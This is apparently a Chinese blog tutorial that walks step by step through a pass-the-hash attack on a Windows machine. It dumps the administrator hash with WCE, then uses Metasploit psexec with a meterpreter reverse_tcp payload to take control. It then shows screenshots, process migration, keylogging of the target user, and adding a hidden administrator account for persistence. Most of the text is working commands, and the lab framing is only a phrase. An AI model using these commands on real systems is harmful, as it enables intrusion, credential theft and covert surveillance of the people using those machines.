在metasploit中只要有密码的哈希值就可以***操作系统了不需要明文密码,下面以实验为目的先用工具wce在操作系统上提取管理员密码的哈希值。
下载wcehttp://1230tt.com/download/wce_v1_4beta_x32.zip
在目标服务器上进入目录wce -l获取管理密码哈希值1AA818381E4E281BAAD3B435B51404EE:5F18A8499CDD4F43D89424AD39CE9AF7
在backtrack里面进入metasploit选择windows/smb/psexec模块,选择meterpreter***载荷设置LHOST本地IP和RHOST目标主机IP,设置SMBUser用户名和密码,然后exploit就可以***了
root@bt:~# msfconsole
msf > use windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.116
msf exploit(psexec) > set RHOST 192.168.1.117
msf exploit(psexec) >set SMBUser administrator
msf exploit(psexec) > set SMBPass 1AA818381E4E281BAAD3B435B51404EE:5F18A8499CDD4F43D89424AD39CE9AF7
在meterpreter下可以截图meterpreter > screenshot可以查看系统信息meterpreter > sysinfo
可以查看系统进程meterpreter > ps,还可以启用键盘记录,查看系统进程然后监视explore.exe进程启动键盘记录就可以查看键盘记录了。meterpreter > migrate 2744
meterpreter > run post/windows/capture/keylog_recorder
记录键盘以txt文件保存在root目录下,cat文件就可以看到目标主机上的键盘记录了。
进入shell添加用户并提升为administrators管理员用户组。
C:\WINDOWS\system32>net user 4 4 /add
C:\WINDOWS\system32>net localgroup administrators 4 /add
原文链接:http://1230tt.com/archives/233.html